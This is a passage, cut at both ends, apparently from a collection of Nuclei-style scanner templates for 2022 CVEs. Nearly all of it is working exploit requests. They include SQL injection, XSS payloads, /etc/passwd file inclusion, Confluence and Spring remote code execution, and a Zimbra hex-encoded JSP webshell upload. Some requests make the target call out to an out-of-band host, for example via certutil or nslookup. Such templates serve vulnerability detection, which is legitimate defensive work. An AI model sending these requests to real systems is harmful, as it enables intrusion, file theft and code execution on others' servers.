{{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"formData\"\n\nemail=example%40oast.me&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&priva\ncy_expiration_action=ignore&fusion-form-nonce-0={{fusionformnonce}}&fusion-fields-hold-private-data=\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"action\"\n\nfusion_form_submit_form_to_url\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusion_form_nonce\"\n\n{{fusionformnonce}}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"form_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"post_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"field_labels\"\n\n{\"email\":\"Email address\"}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"hidden_field_names\"\n\n[]\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionAction\"\n\nhttps://oast.me\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionActionMethod\"\n\nGET\n-----------------------------30259827232283860776499538268--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Interactsh Server"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"fusionformnonce","internal":true,"xpath":["//*[@id=\"fusion-form-nonce-0\"]"],"attribute":"value","part":"body_1"}]}]},{"id":"CVE-2022-38322","info":{"name":"Temenos Transact - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["setupHelp('')\" onerror=\"confirm('document.domain')"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3506","info":{"name":"WordPress Related Posts <2.1.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D\n","GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, \"value=\\\"\\\" autofocus onfocus=alert(document.domain)>\")","contains(body_4, 'The amount of automatically')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-29006","info":{"name":"Directory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DMS || Dashboard","DMS Admin","Admin Profile"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0679","info":{"name":"WordPress Narnoo Distributor <=2.5.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=narnoo_distributor_lib_request&lib_path=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28290","info":{"name":"WordPress Country Selector <1.6.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&lang=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&site_locate=en-US\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","country_selector_"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30512","info":{"name":"School Dormitory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dms/admin/accounts/payment_history.php?account_id=2%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Fatal error","Uncaught Error: Call to a member function fetch_assoc()","<th class=\"\">Month of</th>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0864","info":{"name":"UpdraftPlus < 1.22.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=updraftplus&updraft_interval\"></script><script>confirm('document_domain')</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>confirm('document_domain')</script>","Existing backups"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28363","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","Login Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31984","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26134","info":{"name":"Confluence - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/","{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(to_lower(header_1), \"x-cmd-response:\")"]},{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(to_lower(response_2), \"confluence\")"],"condition":"and"}],"extractors":[{"type":"kval","kval":["x_cmd_response"],"part":"header"}]}]},{"id":"CVE-2022-36883","info":{"name":"Jenkins Git <=4.11.3 - Missing Authorization","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository:","SCM API plugin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27849","info":{"name":"WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Chat Log\"","\"User IP\"","\"User ID\""],"condition":"and"},{"type":"word","part":"header","words":["text/csv"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0087","info":{"name":"Keystone 6 Login Page - Open Redirect and Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/signin?from=https://interact.sh","{{BaseURL}}/signin?from=javascript:alert(document.cookie)"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://interact.sh"]},{"type":"word","part":"body","words":["alert(document.cookie)"]}]}]},{"id":"CVE-2022-30513","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?page=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2551","info":{"name":"WordPress Duplicator <1.4.7 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1","{{BaseURL}}/wp-content/dup-installer/main.installer.php?is_daws=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href='../installer.php'>restart this install process</a>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1391","info":{"name":"WordPress Cab fare calculator < 1.0.4 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32195","info":{"name":"Open edX <2022-06-06 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"+8\"onmouseover=\"alert(document.domain)\">click here to go to"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33119","info":{"name":"NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: \"><script>alert(document.domain)</script><\"\n\nlanguage=en&user=user&pass=pass&submit=Login\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code == 200","contains(body,'<script>alert(document.domain)</script><\\\"?cmd=')"],"condition":"and"}]}]},{"id":"CVE-2022-22965","info":{"name":"Spring - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}} HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\nclass.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx\n","GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1\n"],"payloads":{"interact_protocol":["http","https"]},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"],"case-insensitive":true}]}]},{"id":"CVE-2022-44948","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-1906","info":{"name":"WordPress Copyright Proof <=4.16 - Cross-Site-Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["got message <script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35914","info":{"name":"GLPI <=10.0.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: sid=foo\n\nsid=foo&hhook=exec&text={{cmd}}\n"]},{"raw":["POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: sid=foo\n\nsid=foo&text={{execFunc1}}&hfoo={{cmd}}&hhook=array_map\n"]},{"raw":["POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: sid=foo\n\nsid=foo&text={{execFunc2}}&hfoo={{cmd}}&hhook=array_map\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24716","info":{"name":"Icinga Web 2 - Arbitrary File Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25488","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/ajax/avatar.php?id=-1+union+select+md5({{num}})%23"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/{{md5(num)}}","avatar-container"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23881","info":{"name":"ZZZCMS zzzphp 2.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?location=search HTTP/1.1\nHost: {{Hostname}}\nCookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-43017","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)\"></a><script>alert(document.domain)</script>&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32770","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?toast=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["text: \"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32028","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32015","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-39960","info":{"name":"Jira Netic Group Export <1.0.3 - Missing Authorization","severity":"medium"},"requests":[{"raw":["POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroupexport_searchstring=&groupexport_download=true\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"jiraGroupObjects\"","\"groupName\""],"condition":"and"},{"type":"word","part":"header","words":["attachment","jira-group-export"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37042","info":{"name":"Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\ncontent-type: application/x-www-form-urlencoded\n\n{{hex_decode(\"504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000000000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000f00000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b05060000000002000200d6000000e00100000000\")}}\n","GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1","/service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 401","status_code_2 == 200","contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')"],"condition":"and"}]}]},{"id":"CVE-2022-0434","info":{"name":"WordPress Page Views Count <2.4.15 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5({{num}}),null,null%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4325","info":{"name":"WordPress Post Status Notifier Lite <1.10.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=post-status-notifier-lite&controller=%3Cscript%3Ealert%28%60document.domain%60%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<script>alert(`document.domain`)</script>\")","contains(body_2, \"Post Status Notifier Lite\")"],"condition":"and"}]}]},{"id":"CVE-2022-45038","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/ HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=no&formtoken={{formtoken}}&website_footer=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_trash=inline&home_folders=true&intro_page=false&frontend_login=false&frontend_signup=false&submit=&default_language=EN&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&wbmailer_default_sendername=WBCE+CMS+Mailer&wbmailer_routine=phpmail&wbmailer_smtp_host=&wbmailer_smtp_port=&wbmailer_smtp_secure=&wbmailer_smtp_username=&wbmailer_smtp_password=\n","GET /search/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Results For"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-45269","info":{"name":"Linx Sphere - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../windows/iis.log"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Component Based Setup"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0773","info":{"name":"Documentor <= 1.5.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=doc_search_results&term=&docid=1+AND+(SELECT+6288+FROM+(SELECT(SLEEP(6)))HRaz)\n","GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(content_type_1, \"text/html\")","contains(body_1, \"([])\") && contains(body_2, \".documentor-help\")"],"condition":"and"}]}]},{"id":"CVE-2022-1815","info":{"name":"Drawio <18.1.2 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /service/0/test.oast.me HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-32771","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertSuccess(\"</script><script>alert(document.cookie);</script>","text: \"</script><script>alert(document.cookie);</script>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0594","info":{"name":"WordPress Shareaholic <9.7.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plugin_version","shareaholic_server_reachable"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25082","info":{"name":"TOTOLink - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1\nHost: {{Hostname}}\n","GET /{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":[".sh",".cgi"],"condition":"and"},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34753","info":{"name":"SpaceLogic C-Bus Home Controller <=1.31.460 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /delsnap.pl?name=|id HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29005","info":{"name":"Online Birth Certificate System 1.2 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /obcs/user/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmobno={{username}}&password={{password}}&login=\n","POST /obcs/user/profile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nfname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=\n","GET /obcs/user/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'admin-name\\\">{{str}}<script>alert(document.domain);</script>')"],"condition":"and"}]}]},{"id":"CVE-2022-35653","info":{"name":"Moodle LTI module Reflected - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /mod/lti/auth.php HTTP/1.1\nHost: 